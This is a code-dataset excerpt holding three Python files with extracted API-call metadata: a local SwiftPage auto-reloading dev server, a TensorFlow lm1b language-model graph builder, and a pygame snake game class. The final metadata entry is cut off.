code
stringlengths 22
1.05M
| apis
sequencelengths 1
3.31k
| extract_api
stringlengths 75
3.25M
|
---|---|---|
import os
import time
import webbrowser
import threading
from addons.addons_server import *
from page import *
import http.server
import socketserver
last_modified_time = 0
dev_page_prefix = '''
<html>
<title>SwiftPage Development Server</title>
<script src='https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script>
<script>
var lastRefreshToken = "none";
function loadCommands(filename) {
$.get(filename, function(data, textStatus) {
if (textStatus == 'success') {
var lines = data.match(/^.*(('''
dev_page_middle = '\\'+'r'+'\\'+'n'+'|'+'\\'+'n'+'|'+'\\'+'r'
dev_page_suffix = ''')|$)/gm)
for (var i = 0; i < lines.length; i++) {
//console.log(lines[i]); // TODO: remove
if (lines[i] !== '' && lines[i] !== ' ') {
if (lastRefreshToken !== lines[i]) {
lastRefreshToken = lines[i];
var iframe = document.getElementsByName('content_window')[0];
iframe.src = iframe.src
iframe.contentWindow.location.reload(true);
//iframe.location.reload(true);
}
}
}
} else {
console.log('Commands file does not exist.');
}
});
}
function checkForCommands() {
var filename = '.swiftpage_commands';
loadCommands(filename);
}
setInterval(checkForCommands, 30);
</script>
<body style='padding: 0px; margin: 0px;'>
<iframe src='./site/index.html' name='content_window' style='width: 100%; height: 100%; outline: none;' frameborder='0'></iframe>
</body>
</html>
'''
dev_page = dev_page_prefix+dev_page_middle+dev_page_suffix
addons_server = AddonsServer(page)
def main_loop():
while True:
global last_modified_time
# checks to see if files have been updated
modified_time = os.path.getmtime("page.py")
# if necessary, saves new copy of swiftpage
if last_modified_time != modified_time:
last_modified_time = modified_time
os.system('python create_page.py')
print("Page modified, new SwiftPage generated: "+str(last_modified_time))
# refreshes web browser and writes other commands
commands = open(".swiftpage_commands","w")
commands.write(str(last_modified_time))
commands.close()
else:
# empties commands
commands = open(".swiftpage_commands","w")
commands.write("")
commands.close()
time.sleep(0.6)
def addons_loop():
global addons_server
addons_server.on_update()
# removes existing commands file
os.remove(".swiftpage_commands")
# creates dev_server.html
dev_server_page = open("dev_server.html","w")
dev_server_page.write(dev_page)
dev_server_page.close()
# defines custom HTTP handler
class customHandler(http.server.SimpleHTTPRequestHandler):
def log_message(self, format, *args):
return
# starts web server
port = 8080
handler = customHandler # http.server.SimpleHTTPRequestHandler
t1 = threading.Thread(target=main_loop)
t2 = threading.Thread(target=addons_loop)
with socketserver.TCPServer(("", port), handler) as httpd:
# opens web browser of local server
webbrowser.open('http://127.0.0.1:8080/dev_server.html', new=0, autoraise=True)
print("SwiftPage server running, your site will now be automatically regenerated when changes are made")
# starts loops
t1.start()
t2.start()
# serves html server
httpd.serve_forever()
| [
"threading.Thread",
"os.remove",
"webbrowser.open",
"os.system",
"time.sleep",
"os.path.getmtime",
"socketserver.TCPServer"
] | [((2822, 2854), 'os.remove', 'os.remove', (['""".swiftpage_commands"""'], {}), "('.swiftpage_commands')\n", (2831, 2854), False, 'import os\n'), ((3234, 3268), 'threading.Thread', 'threading.Thread', ([], {'target': 'main_loop'}), '(target=main_loop)\n', (3250, 3268), False, 'import threading\n'), ((3274, 3310), 'threading.Thread', 'threading.Thread', ([], {'target': 'addons_loop'}), '(target=addons_loop)\n', (3290, 3310), False, 'import threading\n'), ((3316, 3359), 'socketserver.TCPServer', 'socketserver.TCPServer', (["('', port)", 'handler'], {}), "(('', port), handler)\n", (3338, 3359), False, 'import socketserver\n'), ((3415, 3494), 'webbrowser.open', 'webbrowser.open', (['"""http://127.0.0.1:8080/dev_server.html"""'], {'new': '(0)', 'autoraise': '(True)'}), "('http://127.0.0.1:8080/dev_server.html', new=0, autoraise=True)\n", (3430, 3494), False, 'import webbrowser\n'), ((2016, 2043), 'os.path.getmtime', 'os.path.getmtime', (['"""page.py"""'], {}), "('page.py')\n", (2032, 2043), False, 'import os\n'), ((2697, 2712), 'time.sleep', 'time.sleep', (['(0.6)'], {}), '(0.6)\n', (2707, 2712), False, 'import time\n'), ((2205, 2239), 'os.system', 'os.system', (['"""python create_page.py"""'], {}), "('python create_page.py')\n", (2214, 2239), False, 'import os\n')] |
# todo: add dropout to trainer
# todo: add GPU support to trainer
# todo: reset lstm hidden state for inference
# todo: cleanup batch_sizing inconsistencies
import tensorflow as tf
import re
import os
import lm1b.model.char_embedding_nodes as char_embedding_nodes
from lm1b.utils.util import merge
from lm1b.utils.model import sharded_linear, create_sharded_weights
NUM_SHARDS = 8
def _attach_cached_lstm_nodes(input, hparams=None):
"""
LSTM with cached / preserved hidden state
see: https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html
see: https://stackoverflow.com/questions/37969065/tensorflow-best-way-to-save-state-in-rnns
:param input: tensor of word embeddings
:param hparams:
:return: lstm output and state
"""
# LSTM with cached / preserved hidden state
# https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html
cell = tf.contrib.rnn.LSTMCell(num_units=NUM_SHARDS * hparams.word_embedding_size,
num_proj=hparams.word_embedding_size,
num_unit_shards=NUM_SHARDS, num_proj_shards=NUM_SHARDS,
forget_bias=1.0, use_peepholes=True)
state_c = tf.get_variable(name="state_c",
shape=(hparams.batch_size * hparams.sequence_length, 8192),
initializer=tf.zeros_initializer,
trainable=False)
state_h = tf.get_variable(name="state_h",
shape=(hparams.batch_size * hparams.sequence_length, 1024),
initializer=tf.zeros_initializer,
trainable=False)
out_0, state_0 = cell(input, tf.nn.rnn_cell.LSTMStateTuple(state_c, state_h))
ass_c = tf.assign(state_c, state_0[0])
ass_h = tf.assign(state_h, state_0[1])
with tf.control_dependencies([ass_c, ass_h]):
out_0 = tf.identity(out_0)
return out_0, state_0
def _attach_projection_nodes(input, hparams=None):
"""
Project LSTM outputs to sparse vectors / word predictions
:param input: lstm outputs
:param hparams:
:return: tensor shaped [?,vocab_size]
"""
softmax_w = create_sharded_weights((hparams.vocab_size / NUM_SHARDS, hparams.word_embedding_size),
num_shards=NUM_SHARDS,
concat_dim=1)
softmax_w = tf.reshape(softmax_w, shape=(-1, hparams.word_embedding_size))
softmax_b = tf.get_variable('b', shape=(hparams.vocab_size))
logits = tf.nn.bias_add(tf.matmul(input, softmax_w, transpose_b=True), softmax_b, data_format="NHWC")
softmax = tf.nn.softmax(logits)
return logits, softmax
def _attach_log_perplexity_nodes(logits, targets, target_weights, hparams=None):
"""
:param logits:
:param targets:
:param target_weights:
:param hparams:
:return:
"""
target_list = tf.reshape(targets, [-1])
target_weights_list = tf.to_float(tf.reshape(target_weights, [-1]))
# hrmm
word_count = tf.add(tf.reduce_sum(target_weights_list), 0.0000999999974738)
cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=target_list)
cross_entropy = tf.multiply(cross_entropy, tf.to_float(target_weights))
return {"log_perplexity": tf.reduce_sum(cross_entropy) / word_count,
"cross_entropy": cross_entropy}
CHAR_EMBEDDING_SCOPE = "char_embedding"
LSTM_SCOPE_PREFIX = "lstm/lstm_"
SOFTMAX_SCOPE = "softmax"
def attach_inference_nodes(input_seqs, hparams=None):
"""
Predict next word for each sequence / timestep in input_seqs
:param input_seqs: tensor of character encoded words
:param hparams:
:return: dict of inference nodes
"""
with tf.variable_scope(CHAR_EMBEDDING_SCOPE):
word_embeddings = char_embedding_nodes.attach_char_embedding_nodes(input_seqs, num_shards=NUM_SHARDS,
hparams=hparams)
word_embeddings = tf.reshape(word_embeddings, (-1, hparams.word_embedding_size))
cell_out = word_embeddings
cell_state_all_layers = []
cell_out_all_layers = []
for layer_num in range(0, 2):
with tf.variable_scope(LSTM_SCOPE_PREFIX + str(layer_num)):
cell_out, cell_state = _attach_cached_lstm_nodes(cell_out, hparams=hparams)
cell_state_all_layers.append(cell_state)
cell_out_all_layers.append(cell_out)
lstm_outputs = tf.reshape(cell_out, shape=(-1, hparams.word_embedding_size))
with tf.variable_scope(SOFTMAX_SCOPE):
logits, softmax = _attach_projection_nodes(lstm_outputs, hparams=hparams)
return {
"word_embeddings": word_embeddings,
"lstm_outputs": lstm_outputs,
"lstm_state": cell_state,
"logits": logits,
"softmax": softmax,
"cell_state_all_layers": cell_state_all_layers,
"cell_out_all_layers": cell_out_all_layers
}
def attach_predicted_word_nodes(logits, id_to_word_lookup_table, k=5, hparams=None):
"""
Helper to pull out the most likely words
:param logits:
:param id_to_word_lookup_table:
:param k:
:param hparams:
:return:
"""
top_k = tf.nn.top_k(logits, k)
top_word_ids = top_k.indices
word_predictions = tf.reshape(id_to_word_lookup_table.lookup(tf.to_int64(tf.reshape(top_word_ids, [-1]))), [-1, k])
return {"predicted_words": word_predictions,
"top_k": top_k}
def attach_training_nodes(loss, hparams=None):
"""
Attach nodes for training. Work in progress...
:param loss:
:param hparams:
:return:
"""
trainable_vars = tf.trainable_variables()
tf.get_collection(tf.GraphKeys.MODEL_VARIABLES, scope="")
tf.global_variables()
all_gradients = tf.gradients(loss, trainable_vars)
lstm_gradients = filter(lambda x: -1 < x.op.name.find("lstm"), all_gradients)
non_lstm_gradients = set(all_gradients).difference(lstm_gradients)
lstm_gradients, global_norm = tf.clip_by_global_norm(lstm_gradients, hparams.lstm_clip_grad_norm)
all_gradients = non_lstm_gradients.union(lstm_gradients)
optimizer = tf.train.AdagradOptimizer(hparams.learning_rate)
global_step = tf.Variable(0, name='global_step', trainable=False)
train_op = optimizer.apply_gradients(zip(all_gradients, trainable_vars), global_step=global_step)
return {"train_op": train_op, "global_step": global_step}
def restore_original_lm1b(sess, run_config):
"""
Var mapping shenanigans to restore the pre-trained model to the current graph
:param sess:
:param run_config:
:return:
"""
def create_lm1b_restoration_var_map(char_embedding_vars, lstm_vars, softmax_vars):
var_map = {}
# Map char embedding vars
var_map = merge(var_map, dict(map(lambda x: (x.op.name, x), char_embedding_vars)))
# Map lstm embedding vars
var_map_regexes = {r"^(" + LSTM_SCOPE_PREFIX + "\d)/lstm_cell/projection/kernel/part_(\d).*": r"\1/W_P_\2",
r"^(" + LSTM_SCOPE_PREFIX + "\d)/lstm_cell/kernel/part_(\d).*": r"\1/W_\2",
r"^(" + LSTM_SCOPE_PREFIX + "\d)/lstm_cell/bias.*": r"\1/B",
r"^(" + LSTM_SCOPE_PREFIX + "\d)/lstm_cell/w_([fio])_diag.*":
lambda match: match.group(1) + "/W_" + match.group(
2).upper() + "_diag",
}
for r_match, r_replace in var_map_regexes.items():
matching_variables = filter(lambda x: re.match(r_match, x.name), lstm_vars)
for v in matching_variables:
var_map[re.sub(r_match, r_replace, v.name)] = v
# Map softmax embedding vars
var_map = merge(var_map, dict(map(lambda x: (x.op.name, x), softmax_vars)))
return var_map
var_map = create_lm1b_restoration_var_map(
char_embedding_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=CHAR_EMBEDDING_SCOPE),
lstm_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=LSTM_SCOPE_PREFIX),
softmax_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=SOFTMAX_SCOPE)
)
saver = tf.train.Saver(var_list=var_map)
saver.restore(sess, os.path.join(run_config['model_dir_path_original'], "ckpt-*"))
| [
"tensorflow.reduce_sum",
"tensorflow.nn.rnn_cell.LSTMStateTuple",
"tensorflow.trainable_variables",
"tensorflow.get_collection",
"tensorflow.identity",
"tensorflow.reshape",
"tensorflow.matmul",
"tensorflow.assign",
"tensorflow.global_variables",
"tensorflow.Variable",
"os.path.join",
"tensorflow.clip_by_global_norm",
"tensorflow.get_variable",
"tensorflow.nn.softmax",
"tensorflow.nn.top_k",
"tensorflow.variable_scope",
"tensorflow.to_float",
"lm1b.model.char_embedding_nodes.attach_char_embedding_nodes",
"tensorflow.gradients",
"re.sub",
"tensorflow.control_dependencies",
"tensorflow.train.Saver",
"tensorflow.train.AdagradOptimizer",
"re.match",
"lm1b.utils.model.create_sharded_weights",
"tensorflow.contrib.rnn.LSTMCell",
"tensorflow.nn.sparse_softmax_cross_entropy_with_logits"
] | [((899, 1113), 'tensorflow.contrib.rnn.LSTMCell', 'tf.contrib.rnn.LSTMCell', ([], {'num_units': '(NUM_SHARDS * hparams.word_embedding_size)', 'num_proj': 'hparams.word_embedding_size', 'num_unit_shards': 'NUM_SHARDS', 'num_proj_shards': 'NUM_SHARDS', 'forget_bias': '(1.0)', 'use_peepholes': '(True)'}), '(num_units=NUM_SHARDS * hparams.word_embedding_size,\n num_proj=hparams.word_embedding_size, num_unit_shards=NUM_SHARDS,\n num_proj_shards=NUM_SHARDS, forget_bias=1.0, use_peepholes=True)\n', (922, 1113), True, 'import tensorflow as tf\n'), ((1218, 1365), 'tensorflow.get_variable', 'tf.get_variable', ([], {'name': '"""state_c"""', 'shape': '(hparams.batch_size * hparams.sequence_length, 8192)', 'initializer': 'tf.zeros_initializer', 'trainable': '(False)'}), "(name='state_c', shape=(hparams.batch_size * hparams.\n sequence_length, 8192), initializer=tf.zeros_initializer, trainable=False)\n", (1233, 1365), True, 'import tensorflow as tf\n'), ((1457, 1604), 'tensorflow.get_variable', 'tf.get_variable', ([], {'name': '"""state_h"""', 'shape': '(hparams.batch_size * hparams.sequence_length, 1024)', 'initializer': 'tf.zeros_initializer', 'trainable': '(False)'}), "(name='state_h', shape=(hparams.batch_size * hparams.\n sequence_length, 1024), initializer=tf.zeros_initializer, trainable=False)\n", (1472, 1604), True, 'import tensorflow as tf\n'), ((1776, 1806), 'tensorflow.assign', 'tf.assign', (['state_c', 'state_0[0]'], {}), '(state_c, state_0[0])\n', (1785, 1806), True, 'import tensorflow as tf\n'), ((1817, 1847), 'tensorflow.assign', 'tf.assign', (['state_h', 'state_0[1]'], {}), '(state_h, state_0[1])\n', (1826, 1847), True, 'import tensorflow as tf\n'), ((2179, 2307), 'lm1b.utils.model.create_sharded_weights', 'create_sharded_weights', (['(hparams.vocab_size / NUM_SHARDS, hparams.word_embedding_size)'], {'num_shards': 'NUM_SHARDS', 'concat_dim': '(1)'}), '((hparams.vocab_size / NUM_SHARDS, hparams.\n word_embedding_size), num_shards=NUM_SHARDS, concat_dim=1)\n', (2201, 2307), False, 'from lm1b.utils.model import sharded_linear, create_sharded_weights\n'), ((2391, 2453), 'tensorflow.reshape', 'tf.reshape', (['softmax_w'], {'shape': '(-1, hparams.word_embedding_size)'}), '(softmax_w, shape=(-1, hparams.word_embedding_size))\n', (2401, 2453), True, 'import tensorflow as tf\n'), ((2468, 2514), 'tensorflow.get_variable', 'tf.get_variable', (['"""b"""'], {'shape': 'hparams.vocab_size'}), "('b', shape=hparams.vocab_size)\n", (2483, 2514), True, 'import tensorflow as tf\n'), ((2634, 2655), 'tensorflow.nn.softmax', 'tf.nn.softmax', (['logits'], {}), '(logits)\n', (2647, 2655), True, 'import tensorflow as tf\n'), ((2882, 2907), 'tensorflow.reshape', 'tf.reshape', (['targets', '[-1]'], {}), '(targets, [-1])\n', (2892, 2907), True, 'import tensorflow as tf\n'), ((3085, 3171), 'tensorflow.nn.sparse_softmax_cross_entropy_with_logits', 'tf.nn.sparse_softmax_cross_entropy_with_logits', ([], {'logits': 'logits', 'labels': 'target_list'}), '(logits=logits, labels=\n target_list)\n', (3131, 3171), True, 'import tensorflow as tf\n'), ((4394, 4455), 'tensorflow.reshape', 'tf.reshape', (['cell_out'], {'shape': '(-1, hparams.word_embedding_size)'}), '(cell_out, shape=(-1, hparams.word_embedding_size))\n', (4404, 4455), True, 'import tensorflow as tf\n'), ((5085, 5107), 'tensorflow.nn.top_k', 'tf.nn.top_k', (['logits', 'k'], {}), '(logits, k)\n', (5096, 5107), True, 'import tensorflow as tf\n'), ((5503, 5527), 'tensorflow.trainable_variables', 'tf.trainable_variables', ([], {}), '()\n', (5525, 5527), True, 'import tensorflow as tf\n'), ((5530, 5587), 'tensorflow.get_collection', 'tf.get_collection', (['tf.GraphKeys.MODEL_VARIABLES'], {'scope': '""""""'}), "(tf.GraphKeys.MODEL_VARIABLES, scope='')\n", (5547, 5587), True, 'import tensorflow as tf\n'), ((5590, 5611), 'tensorflow.global_variables', 'tf.global_variables', ([], {}), '()\n', (5609, 5611), True, 'import tensorflow as tf\n'), ((5630, 5664), 'tensorflow.gradients', 'tf.gradients', (['loss', 'trainable_vars'], {}), '(loss, trainable_vars)\n', (5642, 5664), True, 'import tensorflow as tf\n'), ((5847, 5914), 'tensorflow.clip_by_global_norm', 'tf.clip_by_global_norm', (['lstm_gradients', 'hparams.lstm_clip_grad_norm'], {}), '(lstm_gradients, hparams.lstm_clip_grad_norm)\n', (5869, 5914), True, 'import tensorflow as tf\n'), ((5989, 6037), 'tensorflow.train.AdagradOptimizer', 'tf.train.AdagradOptimizer', (['hparams.learning_rate'], {}), '(hparams.learning_rate)\n', (6014, 6037), True, 'import tensorflow as tf\n'), ((6054, 6105), 'tensorflow.Variable', 'tf.Variable', (['(0)'], {'name': '"""global_step"""', 'trainable': '(False)'}), "(0, name='global_step', trainable=False)\n", (6065, 6105), True, 'import tensorflow as tf\n'), ((7936, 7968), 'tensorflow.train.Saver', 'tf.train.Saver', ([], {'var_list': 'var_map'}), '(var_list=var_map)\n', (7950, 7968), True, 'import tensorflow as tf\n'), ((1716, 1763), 'tensorflow.nn.rnn_cell.LSTMStateTuple', 'tf.nn.rnn_cell.LSTMStateTuple', (['state_c', 'state_h'], {}), '(state_c, state_h)\n', (1745, 1763), True, 'import tensorflow as tf\n'), ((1856, 1895), 'tensorflow.control_dependencies', 'tf.control_dependencies', (['[ass_c, ass_h]'], {}), '([ass_c, ass_h])\n', (1879, 1895), True, 'import tensorflow as tf\n'), ((1909, 1927), 'tensorflow.identity', 'tf.identity', (['out_0'], {}), '(out_0)\n', (1920, 1927), True, 'import tensorflow as tf\n'), ((2544, 2589), 'tensorflow.matmul', 'tf.matmul', (['input', 'softmax_w'], {'transpose_b': '(True)'}), '(input, softmax_w, transpose_b=True)\n', (2553, 2589), True, 'import tensorflow as tf\n'), ((2944, 2976), 'tensorflow.reshape', 'tf.reshape', (['target_weights', '[-1]'], {}), '(target_weights, [-1])\n', (2954, 2976), True, 'import tensorflow as tf\n'), ((3010, 3044), 'tensorflow.reduce_sum', 'tf.reduce_sum', (['target_weights_list'], {}), '(target_weights_list)\n', (3023, 3044), True, 'import tensorflow as tf\n'), ((3212, 3239), 'tensorflow.to_float', 'tf.to_float', (['target_weights'], {}), '(target_weights)\n', (3223, 3239), True, 'import tensorflow as tf\n'), ((3702, 3741), 'tensorflow.variable_scope', 'tf.variable_scope', (['CHAR_EMBEDDING_SCOPE'], {}), '(CHAR_EMBEDDING_SCOPE)\n', (3719, 3741), True, 'import tensorflow as tf\n'), ((3765, 3870), 'lm1b.model.char_embedding_nodes.attach_char_embedding_nodes', 'char_embedding_nodes.attach_char_embedding_nodes', (['input_seqs'], {'num_shards': 'NUM_SHARDS', 'hparams': 'hparams'}), '(input_seqs, num_shards=\n NUM_SHARDS, hparams=hparams)\n', (3813, 3870), True, 'import lm1b.model.char_embedding_nodes as char_embedding_nodes\n'), ((3959, 4021), 'tensorflow.reshape', 'tf.reshape', (['word_embeddings', '(-1, hparams.word_embedding_size)'], {}), '(word_embeddings, (-1, hparams.word_embedding_size))\n', (3969, 4021), True, 'import tensorflow as tf\n'), ((4464, 4496), 'tensorflow.variable_scope', 'tf.variable_scope', (['SOFTMAX_SCOPE'], {}), '(SOFTMAX_SCOPE)\n', (4481, 4496), True, 'import tensorflow as tf\n'), ((7991, 8052), 'os.path.join', 'os.path.join', (["run_config['model_dir_path_original']", '"""ckpt-*"""'], {}), "(run_config['model_dir_path_original'], 'ckpt-*')\n", (8003, 8052), False, 'import os\n'), ((3270, 3298), 'tensorflow.reduce_sum', 'tf.reduce_sum', (['cross_entropy'], {}), '(cross_entropy)\n', (3283, 3298), True, 'import tensorflow as tf\n'), ((7667, 7743), 'tensorflow.get_collection', 'tf.get_collection', (['tf.GraphKeys.GLOBAL_VARIABLES'], {'scope': 'CHAR_EMBEDDING_SCOPE'}), '(tf.GraphKeys.GLOBAL_VARIABLES, scope=CHAR_EMBEDDING_SCOPE)\n', (7684, 7743), True, 'import tensorflow as tf\n'), ((7759, 7832), 'tensorflow.get_collection', 'tf.get_collection', (['tf.GraphKeys.GLOBAL_VARIABLES'], {'scope': 'LSTM_SCOPE_PREFIX'}), '(tf.GraphKeys.GLOBAL_VARIABLES, scope=LSTM_SCOPE_PREFIX)\n', (7776, 7832), True, 'import tensorflow as tf\n'), ((7851, 7920), 'tensorflow.get_collection', 'tf.get_collection', (['tf.GraphKeys.GLOBAL_VARIABLES'], {'scope': 'SOFTMAX_SCOPE'}), '(tf.GraphKeys.GLOBAL_VARIABLES, scope=SOFTMAX_SCOPE)\n', (7868, 7920), True, 'import tensorflow as tf\n'), ((5214, 5244), 'tensorflow.reshape', 'tf.reshape', (['top_word_ids', '[-1]'], {}), '(top_word_ids, [-1])\n', (5224, 5244), True, 'import tensorflow as tf\n'), ((7334, 7359), 're.match', 're.match', (['r_match', 'x.name'], {}), '(r_match, x.name)\n', (7342, 7359), False, 'import re\n'), ((7423, 7457), 're.sub', 're.sub', (['r_match', 'r_replace', 'v.name'], {}), '(r_match, r_replace, v.name)\n', (7429, 7457), False, 'import re\n')] |
import pygame, sys
import time
from pygame.math import Vector2
from .config import FPS, xSize, ySize, cell_size, cell_number, CUTTING
from .eatable.saw import Saw
from .eatable.cake import Cake
class Snake(object):
is_moving = False
def __init__(self, screen: pygame.Surface) -> None:
self.load_snake_texture()
self.body = [Vector2(5,10),Vector2(4,10),Vector2(3,10)]
self.pyScreen = screen
self.direction = Vector2(1,0)
self.new_block = False
self.slowed = False
def draw_snake_object(self) -> None:
for index, block in enumerate(self.body):
# rect for positioning
x_pos = int(block.x * cell_size)
y_pos = int(block.y * cell_size)
block_rect = pygame.Rect(x_pos, y_pos, cell_size, cell_size)
# what direction is tha face
if index == 0:
self.pyScreen.blit(self.head,block_rect)
elif index == len(self.body) - 1:
self.pyScreen.blit(self.tail,block_rect)
else:
previous_block = self.body[index + 1] - block
next_block = self.body[index - 1] - block
if previous_block.x == next_block.x:
self.pyScreen.blit(self.body_vertical, block_rect)
elif previous_block.y == next_block.y:
self.pyScreen.blit(self.body_horizontal, block_rect)
else:
if previous_block.x == -1 and next_block.y == -1 or previous_block.y == -1 and next_block.x == -1:
self.pyScreen.blit(self.body_tl, block_rect)
elif previous_block.x == -1 and next_block.y == 1 or previous_block.y == 1 and next_block.x == -1:
self.pyScreen.blit(self.body_bl, block_rect)
elif previous_block.x == 1 and next_block.y == -1 or previous_block.y == -1 and next_block.x == 1:
self.pyScreen.blit(self.body_tr, block_rect)
elif previous_block.x == 1 and next_block.y == 1 or previous_block.y == 1 and next_block.x == 1:
self.pyScreen.blit(self.body_br, block_rect)
def draw_snake(self) -> None:
# Update Snake-Model
self.update_head_graphics()
self.update_tail_graphics()
self.draw_snake_object()
def update_tail_graphics(self) -> pygame.Surface:
tail_relation = self.body[-2] - self.body[-1]
if tail_relation == Vector2(-1,0): self.tail = self.tail_left
elif tail_relation == Vector2(1,0): self.tail = self.tail_right
elif tail_relation == Vector2(0,-1): self.tail = self.tail_up
elif tail_relation == Vector2(0,1): self.tail = self.tail_down
def update_head_graphics(self) -> pygame.Surface:
head_relation = self.body[1] - self.body[0]
if head_relation == Vector2(-1,0): self.head = self.head_left
elif head_relation == Vector2(1,0): self.head = self.head_right
elif head_relation == Vector2(0,-1): self.head = self.head_up
elif head_relation == Vector2(0,1): self.head = self.head_down
def move_snake(self) -> None:
if Saw.get_cutted() == False or len(self.body) < (abs(CUTTING)+1):
if self.new_block == True:
body_copy = self.body[:]
body_copy.insert(0, body_copy[0] + self.direction)
self.body = body_copy[:]
if Cake.eated_the_cake():
if Cake.get_cake_countdown() != 0:
Cake.decrase_cake_countdown()
else:
Cake.remove_cake()
self.new_block = False
else:
self.new_block = False
else:
body_copy = self.body[:-1]
body_copy.insert(0, body_copy[0] + self.direction)
self.body = body_copy[:]
else:
self.new_block = False
body_copy = self.body[:CUTTING]
body_copy.insert(0, body_copy[0] + self.direction)
self.body = body_copy[:]
Saw.cutting_done()
Snake.is_moving = False
def set_direction(self, vec) -> pygame.Surface:
#Snake.is_moving = True
self.direction = vec
def add_block(self) -> None:
self.new_block = True
def load_snake_texture(self) -> pygame.Surface:
# Kopf
self.head_up = pygame.image.load('assets/Schlange/Schlange_Kopf_oben.png')
self.head_right = pygame.image.load('assets/Schlange/Schlange_Kopf_rechts.png')
self.head_left = pygame.image.load('assets/Schlange/Schlange_Kopf_links.png')
self.head_down = pygame.image.load('assets/Schlange/Schlange_Kopf_unten.png')
# Schwanz
self.tail_up = pygame.image.load('assets/Schlange/Schlange_Schwanz_oben.png')
self.tail_down = pygame.image.load('assets/Schlange/Schlange_Schwanz_unten.png')
self.tail_right = pygame.image.load('assets/Schlange/Schlange_Schwanz_rechts.png')
self.tail_left = pygame.image.load('assets/Schlange/Schlange_Schwanz_links.png')
# Körper
self.body_vertical = pygame.image.load('assets/Schlange/Schlange_vertikal.png')
self.body_horizontal = pygame.image.load('assets/Schlange/Schlange_horizontal.png')
# Directions
self.body_tr = pygame.image.load('assets/Schlange/Schlange_Ecke_rechts_oben.png')
self.body_tl = pygame.image.load('assets/Schlange/Schlange_Ecke_links_oben.png')
self.body_br = pygame.image.load('assets/Schlange/Schlange_Ecke_rechts_unten.png')
self.body_bl = pygame.image.load('assets/Schlange/Schlange_Ecke_links_unten.png') | [
"pygame.image.load",
"pygame.math.Vector2",
"pygame.Rect"
] | [((453, 466), 'pygame.math.Vector2', 'Vector2', (['(1)', '(0)'], {}), '(1, 0)\n', (460, 466), False, 'from pygame.math import Vector2\n'), ((4531, 4590), 'pygame.image.load', 'pygame.image.load', (['"""assets/Schlange/Schlange_Kopf_oben.png"""'], {}), "('assets/Schlange/Schlange_Kopf_oben.png')\n", (4548, 4590), False, 'import pygame, sys\n'), ((4617, 4678), 'pygame.image.load', 'pygame.image.load', (['"""assets/Schlange/Schlange_Kopf_rechts.png"""'], {}), "('assets/Schlange/Schlange_Kopf_rechts.png')\n", (4634, 4678), False, 'import pygame, sys\n'), ((4704, 4764), 'pygame.image.load', 'pygame.image.load', (['"""assets/Schlange/Schlange_Kopf_links.png"""'], {}), "('assets/Schlange/Schlange_Kopf_links.png')\n", (4721, 4764), False, 'import pygame, sys\n'), ((4790, 4850), 'pygame.image.load', 'pygame.image.load', (['"""assets/Schlange/Schlange_Kopf_unten.png"""'], {}), "('assets/Schlange/Schlange_Kopf_unten.png')\n", (4807, 4850), False, 'import pygame, sys\n'), ((4893, 4955), 'pygame.image.load', 'pygame.image.load', (['"""assets/Schlange/Schlange_Schwanz_oben.png"""'], {}), "('assets/Schlange/Schlange_Schwanz_oben.png')\n", (4910, 4955), False, 'import pygame, sys\n'), ((4981, 5044), 'pygame.image.load', 'pygame.image.load', (['"""assets/Schlange/Schlange_Schwanz_unten.png"""'], {}), "('assets/Schlange/Schlange_Schwanz_unten.png')\n", (4998, 5044), False, 'import pygame, sys\n'), ((5071, 5135), 'pygame.image.load', 'pygame.image.load', (['"""assets/Schlange/Schlange_Schwanz_rechts.png"""'], {}), "('assets/Schlange/Schlange_Schwanz_rechts.png')\n", (5088, 5135), False, 'import pygame, sys\n'), ((5161, 5224), 'pygame.image.load', 'pygame.image.load', (['"""assets/Schlange/Schlange_Schwanz_links.png"""'], {}), "('assets/Schlange/Schlange_Schwanz_links.png')\n", (5178, 5224), False, 'import pygame, sys\n'), ((5272, 5330), 'pygame.image.load', 'pygame.image.load', (['"""assets/Schlange/Schlange_vertikal.png"""'], {}), "('assets/Schlange/Schlange_vertikal.png')\n", (5289, 5330), False, 'import pygame, sys\n'), ((5362, 5422), 'pygame.image.load', 'pygame.image.load', (['"""assets/Schlange/Schlange_horizontal.png"""'], {}), "('assets/Schlange/Schlange_horizontal.png')\n", (5379, 5422), False, 'import pygame, sys\n'), ((5468, 5534), 'pygame.image.load', 'pygame.image.load', (['"""assets/Schlange/Schlange_Ecke_rechts_oben.png"""'], {}), "('assets/Schlange/Schlange_Ecke_rechts_oben.png')\n", (5485, 5534), False, 'import pygame, sys\n'), ((5558, 5623), 'pygame.image.load', 'pygame.image.load', (['"""assets/Schlange/Schlange_Ecke_links_oben.png"""'], {}), "('assets/Schlange/Schlange_Ecke_links_oben.png')\n", (5575, 5623), False, 'import pygame, sys\n'), ((5647, 5714), 'pygame.image.load', 'pygame.image.load', (['"""assets/Schlange/Schlange_Ecke_rechts_unten.png"""'], {}), "('assets/Schlange/Schlange_Ecke_rechts_unten.png')\n", (5664, 5714), False, 'import pygame, sys\n'), ((5738, 5804), 'pygame.image.load', 'pygame.image.load', (['"""assets/Schlange/Schlange_Ecke_links_unten.png"""'], {}), "('assets/Schlange/Schlange_Ecke_links_unten.png')\n", (5755, 5804), False, 'import pygame, sys\n'), ((354, 368), 'pygame.math.Vector2', 'Vector2', (['(5)', '(10)'], {}), '(5, 10)\n', (361, 368), False, 'from pygame.math import Vector2\n'), ((368, 382), 'pygame.math.Vector2', 'Vector2', (['(4)', '(10)'], {}), '(4, 10)\n', (375, 382), False, 'from pygame.math import Vector2\n'), ((382, 396), 'pygame.math.Vector2', 'Vector2', (['(3)', '(10)'], {}), '(3, 10)\n', (389, 396), False, 'from pygame.math import Vector2\n'), ((768, 815), 'pygame.Rect', 'pygame.Rect', (['x_pos', 'y_pos', 'cell_size', 'cell_size'], {}), '(x_pos, y_pos, cell_size, cell_size)\n', (779, 815), False, 'import pygame, sys\n'), ((2521, 2535), 'pygame.math.Vector2', 'Vector2', (['(-1)', '(0)'], {}), '(-1, 0)\n', (2528, 2535), False, 'from pygame.math import Vector2\n'), ((2911, 2925), 'pygame.math.Vector2', 'Vector2', (['(-1)', '(0)'], {}), '(-1, 0)\n', (2918, 2925), False, 'from pygame.math import 